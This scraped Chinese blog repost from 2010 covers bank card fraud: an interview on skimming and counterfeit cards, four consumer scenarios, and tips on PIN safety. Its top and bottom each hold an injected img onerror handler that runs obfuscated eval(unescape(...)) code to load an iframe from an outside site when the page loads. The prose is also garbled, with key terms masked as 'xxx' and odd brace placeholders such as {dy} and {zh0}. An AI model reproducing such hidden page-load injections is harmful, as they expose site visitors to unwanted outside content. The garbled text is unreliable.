为你揭密xxx使用漏洞- 北京金融- incisive - 和讯博客
为你揭密xxx使用漏洞 [转贴 2010-05-12 21:26:47]   
为你揭密xxx使用漏洞

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_468_60.html%20width%3D468%20height%3D60%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

“您于06年10月10日用工商银行信用卡发生一笔5860元的交易,查询电话8888887……”,在xxx诈骗的诸多骗术曝光之后,大家基本都把收到这样的短信当作笑谈。但除了这些劣质的骗术,你还可能遭遇难以察觉的xxx事故,比如此文记载的一些常见场景,我们每个人至少都会亲历一二,别不在意!那么,首先让专家来解释一个老问题:xxx到底安全吗?
xxx安全吗?
——中科院软件学院院长潘辛平揭密xxx欺诈
本刊记者/张志峰
案例:
        记者经过举报者指点,在百度贴吧里输入“xxx”三个字,出现的搜索结果让人触目惊心,到处充斥着办理xxx、xx网银的技术,甚至是xx制造xxx设备的帖子,并都留有OICQ联系方式。
        记者匿名混在这个由盗窃网银高手、洗钱专家和居心叵测地寻找专家的人组成的OICQ群里10天,几次发现有号称是XX银行的工作人员的网友出入。他们或详细或模糊地介绍自己的工作性质和所在银行,希望在这个群里找到合作伙伴。经常是两个人谈得投契后,就互相加彼此为OICQ好友,单独沟通合作细节去了。
        这些自称是银行工作人员的网友,自报的工作单位几乎囊括了目前的几大银行。假如他们是真的,那他们比普通犯罪分子更容易取得用户的账号、身份证及密码,更加清楚账户上的余额有多少、哪个才是目标,更容易将犯罪活动做得滴水不漏。这也就不难理解,为什么每次有银行的工作人员加入该群,都受到大家的热烈欢迎了。
                                                信息来源:中国江西新闻网
        在最近的一件案例中,北京郊县的一所医院的二十多名职工的农行xxx内工资离奇被盗。对此,中国银联的工作人员如此解释:钱被取走只有两个可能,其一,罪犯伪造xxx或者复制xxx。如果是伪造,那么肯定是客户信息档案被泄露了,xxx承载的信息有严格的加密体系,必须xx或xx加密体系后才能伪造出xxx,而xxx有专用的计算机系统,要xx加密体系,必须有条件进入该系统。第二个可能性相对大一些,复制xxx,有可能是储户不小心把自己的卡号、密码、身份证号同时泄露了。
        《钱经》:通过这个案例,可以看到目前做伪卡、xx网银资料等犯罪行为相当猖獗,老百姓在使用这些电子支付手段时似乎感觉越来越不安全了。
        潘辛平:信用卡欺诈、网银盗窃等金融犯罪行为是世界性的一个难题,国外甚至有很多专门从事电子金融欺诈、盗窃的组织。随着信用卡在国内越来越普及,暴露出来的问题会更多。
      应该看到现在国内的银行为防止信用卡诈骗已经做了很多的工作。我一个同事跟我讲:在“十一”长假期间,她去外地用信用卡消费了两笔大单子,结果回来买机票的时候发现刷不通了。打电话问银行,银行说因为发现两笔异常交易,又没联系到你本人(打电话关机),为了防止可能的风险,就把卡先停了。
      这表明银行后台系统在实时的监控用户端行为,一旦发现异常交易行为(与你平常的交易区域和交易习惯不同),就会打电话验证,防止伪卡在进行消费,避免客户资金损失。
      此外,现在很多银行都可以随时按客户要求调整信用额度,当然不能超过{zg}限额。这样在平时你可以申请调低透支额度,如果遇到出差、出国等情况,再调高透支额度,这样即使遭受伪卡欺诈,损失也比较小。
      《钱经》:那些信用卡大盗们都是用什么手段攫取用户资金的?
      潘辛平:方法很多,可称得上是道高一尺、魔高一丈。在技术上制作伪卡非常容易,就是一张磁条而已,最关键的一步就是xx用户的资料信息。窃取用户资料信息的途径有的是从银行,有的是从帮助银行处理信息的公司,还有的直接从用户自己。
      讲一个盗窃组织常用的“开黑店”的做法:开一个店铺,和xxx组织签订协议。用户到店铺消费刷卡,{dy}次输入密码信息,但刷卡不通,这时候已经把你的xxx信息复制了,包括密码、磁条码。再换一个机器重刷一次,这台机器才是和银联相联的正常的机器。你在这次刷卡消费的过程中,所有的资料信息就被盗窃组织轻而易举的获取了,然后他们制作伪卡去交易,都会得到承认。
      《钱经》:听起来确实是挺危险的,那用户该怎么办?
      潘辛平:要养成良好的用卡习惯,不要把信用卡随便的借给别人使用。要及时核实对账单上的每一笔消费。而且要经常刷卡,这样银行才能了解你通常的用卡情况,在发生异常交易的时候会打电话进行验证。
      现在有签名和密码两种验证用户身份的方式。密码卡似乎在使用上xxx,但要注意,窃贼在xx用户信息的时候往往将密码一起xx了,就如我刚才提到的那种“开黑店”的办法就可以做到。相比密码卡,签名卡在法律意义上显得xxx一些。如果窃贼用伪卡消费,使用假签名蒙混过关,那么持真卡的用户就可以去找银行,拒绝还款。但如果是密码卡,那么伪卡只要密码通过了,用户就得承担全部损失。美国的xxx条例就有这样的规定:只要签名不是持卡人自己的,那么当被伪卡诈骗时,持卡人最多只承担50美元的损失,其他的损失由银行和商户分担。
      《钱经》:除了信用卡以外,网银安全问题也暴露得越来越多,前段时期“网银受害者联盟集体维权”事件就闹得沸沸扬扬。
      潘辛平:在美国,网银欺诈比伪卡欺诈更严重。因为使用网银以前都不需要密码,知道姓名和卡号就行。后来才逐渐的要求加上密码、社会保险号等。
      网银用户{zh0}要使用数字证书,数字证书是你网上的身份证和电子认证,它保存在一个类似我们经常用的U盘一样的东西上,当你使用网上银行的时候把它插到计算机上,你和网上银行之间进行数字身份证确认。用了数字证书,即使窃贼知道你的卡号、用户名,也不能进行网上交易。
      《钱经》:面对越来越多的信用卡欺诈和网银盗窃案件,在法律上我们都是怎么规定的?
      潘辛平:很遗憾,在这方面我们国家很欠缺,案件发生后各方该承担什么责任,界定得都很模糊。特别是对于一些信用卡诈骗行为,我们国家还按诈骗罪论处。有时金额只有几千元,都够不上量刑。但信用卡诈骗是破坏个人信用、扰乱金融秩序,在西方国家这种行为和伪造个人支票都是很重的罪,要受到相当严厉的惩罚。
常见场景防范xxx漏洞
  本刊记者/肖茹
        当钱包里厚厚的一叠钞票已经被一张张巴掌大的卡片取代的时候,刷卡消费就已经和我们的生活紧密地联系在一起了。对于“都市卡族”来说,无论在商场、超市、酒店、娱乐场所甚至是网络,只要有一张xxx就能够随时随地消费,极为便捷。xxx消费可能存在着不少的漏洞,假如突然有{yt}你发现自己xxx里的钱不翼而飞了,你该怎么办?想要{zd0}限度避免这种情况的发生,你又应该注意些什么呢?我们在使用xxx时会经常碰到如下的几个场景,千万别大意,来看看xxx究竟有哪些漏洞,我们又该如何防范。
      场景一:信号不好,再刷一次
      王先生,保险从业人员,平时习惯用xxx消费。
      这{yt},王先生约了几个朋友来到一家比较有名的饭店吃饭,吃完饭到收银台结账时,王先生用xxx支付了本次消费。
      几天以后,王先生在查询自己的xxx消费明细记录时,却发现多出了一笔费用,而多出的这笔费用与当天在饭店消费的价钱一样,并且消费时间仅相差几分钟。王先生仔细回想当时的情景:
      在王先生将xxx递给收银员之后,收银员将卡在xxx上刷了一下,但是这次并没有打印出银单,几秒钟之后,收银员又将卡在xxx上刷了一下,这次才打印出了银单,而王先生就是在这张银单上签字确认了这次消费的。很明显,问题就是出在没有打印出银单的{dy}次刷卡上。
      于是,王先生找到了银行,查明了问题的原因,是由于银行系统与饭店收费系统的数据传输产生了问题,银行随即将钱款退还给王先生。
      提示:定期查询xxx消费明细记录
      王先生的问题得到了解决,是因为王先生有查询自己消费记录的习惯。而很多xxx用户在使用xxx消费时,往往都将查询消费记录忽略了,没有意识到这样做的重要性。反过来说,如果用户不去查询,那么银行会通知用户他的消费记录存在问题吗?银行会连通饭店一起来主动为消费者解决问题吗?与王先生类似的遭遇是十分常见的,习惯刷卡消费的人经常会在交费时遇到收银员说:“刚才信号没有过来,请再输入一次密码……”之类的情况,而像借记卡这样的xxx在消费时是凭密码就可以完成的,那么提示两次输入密码时,会不会发生两次消费?
      与此类似的是另一种情况,我们经常结帐时把卡交给服务生去刷,对于哪些没有密码的信用卡,这个习惯可能存在风险,谁也不知道会不会有心术不正者偷刷几次,而签名就在每张信用卡的背面,模仿起来并不费劲。所以,在使用xxx消费的时候,作为消费者{zh0}定期查询自己的消费记录,掌握一定的主动性,这样做能够在一定程度上保护自己的财产安全。
      场景二:不改原始密码又怎样
      徐先生,某私企经理。
      徐先生因为工作原因常年当“空中飞人”,而很多时候买机票,订酒店或者是到出差地应酬消费,都习惯用xxx结算。为了避免密码记错而产生尴尬,徐先生一直使用xxx的原始密码。
      今年年初的某天,当徐先生在外地和朋友聚餐结束后准备用xxx进行结算时,被收银人员告知卡内余额不足,徐先生当时诧异极了,因为他出差前特地查询了卡余额,确定还有5万元,除了出差时的各项支出外,他大概推算出卡内现余额应有1万多元。于是他打了银行客服热线进行询问,却被告知他的最近一笔支出是通过ATM机取款的,而在此之前已分两天共提取了1.5万元(因ATM机每天至多能取5000元)。徐先生意识到自己的xxx已经出现问题了,于是马上进行了挂失并报了警。
      那么,徐先生卡里的钱究竟是怎么被不法分子盗走的呢?”徐先生的xxx并没有丢失,而卡里的钱怎么会不翼而飞呢?最不可思议的是,盗窃者居然是通过ATM机提款的,这更让徐先生一头雾水了。
      提示:经常更改密码,警惕各种盗窃
      其实这种卡号被黑的作案手法很简单,盗窃者先低价收集一些废旧的xxx,通过办理各银行的xxx,推断出该行发行xxx卡号的规律。一些银行使用同一原始密码,而且很多人都不去更改。盗窃者就利用这一点,通过拨打xx行的电话银行确认所猜出的卡号和密码是否正确。一旦确认,盗窃者就通过事先准备好的电脑和读卡器,将xxx的用户资料输入购买的废旧xxx中,就能成功地伪造出一张其他用户的xxx,并可以提取现金。
      在这里提醒大家,更改xxx的初始密码是十分必要的,随着网络购物、电话购物等多种渠道的出现,网络银行支付、电话银行支付等多种支付方式也应运而生。而在这些支付方式中,密码就是用户的{wy}识别信息,只要密码正确,就可以进行转账。所以,及时并且经常更改自己的xxx密码,也是保护自己个人财产的重要手段。
      场景三:嘿!告诉你密码,帮我…
      李小姐,白领职员,经常使用xxx购买各种化妆品。由于是某商场的常客,李小姐与柜台的导购混得比较熟。由于李小姐性格外向,平时总是大大咧咧的,在商场人多的时候,李小姐不愿意自己排队付款,所以就将卡交给专柜的导购,并告诉导购xxx密码,委托其交款。
      有一段时间,李小姐经常感觉xxx账户里的存款莫名其妙地减少了。开始的时候李小姐以为是自己买了东西但是忘记了,然而时间一长,这种情况时有发生,李小姐也开始怀疑起来。
      李小姐到银行查询了自己的xxx使用记录,发现自己的xxx有几次网络购物消费的情况,可李小姐清楚地知道,虽然开通了网上银行,但自己近期没有在网上消费过,想来想去,也只有商场柜台的导购在帮自己交款时知道自己的密码。
      李小姐随即更改了xxx的密码并报了警,之后再没有发现类似xxx账户存款无端减少的情况。
      提示:时刻保护卡密码的安全
      在这个小故事中,李小姐随意将xxx密码泄露给他人是导致李小姐xxx存款失窃的主要原因之一,而卡密码又与网银密码一致,所以才使别人钻了空子。需要提醒的是,在使用xxx进行消费时,一定要自己亲自刷卡消费,切勿将xxx密码告知他人。并且还要注意的是,应该不定期的更改xxx密码,以防万一。同时,在这个“密码时代”里,需要各种各样的密码才能保护我们个人信息以及财产的安全,而密码是需要自己来保密的,所以,任何时候都不要轻易地泄露自己的密码。
        场景四:知道我的卡号有什么关系
      赵先生,平面设计师。
      有一次,赵先生来到一家商场购物,并准备用xxx支付。但是在支付时商场的导购按照商场的规定,要求赵先生在一张表格上填写自己的姓名、xxx开户行以及xxx号等信息,而表格就放在导购的柜台上,凡是来此消费的消费者或者是导购自己都可以清楚地看到前几位顾客的姓名以及xxx号等相关信息。那么,这样做是否会导致顾客的个人信息泄露呢?
      赵先生对此也产生了疑惑,便询问商场的导购这样做的目的是什么。据导购回答,商场之所以这样做是因为商场没有顾客消费的存根,当赵先生进一步问及为什么会没有存根时,并没有从导购这里得到准确的回答。
      最终,赵先生放弃了本次消费。
      提示:不轻易泄露个人及xxx信息
      虽然商场这样做可能是由于多种原因,但是无论出于什么原因,这样做明显会导致顾客xxx的相关信息的泄露。也许商场可以采取每位顾客单独单页登记的方法,或者采用更加严格的保密措施来保证顾客个人信息的安全,但遗憾的是商场并没有做到。如果有不法分子在登记的短时间内记住了前面登记顾客的xxx卡号,而这位顾客又没有及时更改xxx的初始密码(例如111111、888888等),那么顾客xxx内的存款就相当危险了。
      不过从理论来说,泄漏了卡号并不会造成什么危害,可能有人会担心丢失了取款或者刷卡的回单,其实不法分子的“盗卡”技术再高超也必须了解事主的身份证号、密码和卡号,缺一不可,单凭一张回单就无法xx卡中现金的。
      尽管如此,对于顾客来说,应该随时随地警惕自己的xxx以及个人信息――特别是密码是否有泄露的危险,如果在消费时感觉到自己的个人信息有泄露的可能,应该在经过合理分析之后选择接受或者是拒绝。
        虽然xxx消费存在着不少的漏洞,但是不可否认xxx消费给我们的生活带来了巨大的便利。要利用好xxx这个工具,就要自己主动地去减少漏洞可能会对我们造成的威胁。主动定期查询消费明细记录、注意xxx密码的保密、注意个人信息以及xxx卡号的保密、更改xxx的原始密码并经常更改密码这些手段都能够有效地保障xxx账户资金的安全。另外,还要警惕花样繁多的xxx诈骗行为,不贪图“中奖诈骗”这样的“意外之财”、也要冷静处理类似于“xxx异地消费诈骗”这样的“意外之忧”。
链接:
  部分银行官方网址
      中国工商银行  
      中国银行  
      中国建设银行  
      中国农业银行  
      光大银行  
      华夏银行  
      民生银行  
      招商银行  
      交通银行  
      浦东发展银行  
      兴业银行  
      北京银行  
      广东发展银行ebank.gdb.com.cn
      中信银行sh.citicib.com.cn
  
      工、农、中、建、交等银行的服务电话分别为95588、95599、95566、95533、95559。
《钱经》提示大家注意:
        xxx和身份证不要放在一起;取钱时注意不要让其他人看到密码;密码取得要特别一些,千万不要取生日等容易xx的密码;如果是集体申办的xxx,特别是这种代发工资卡,一定要及时的修改初始密码。

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【为你揭密xxx使用漏洞- 北京金融- incisive - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——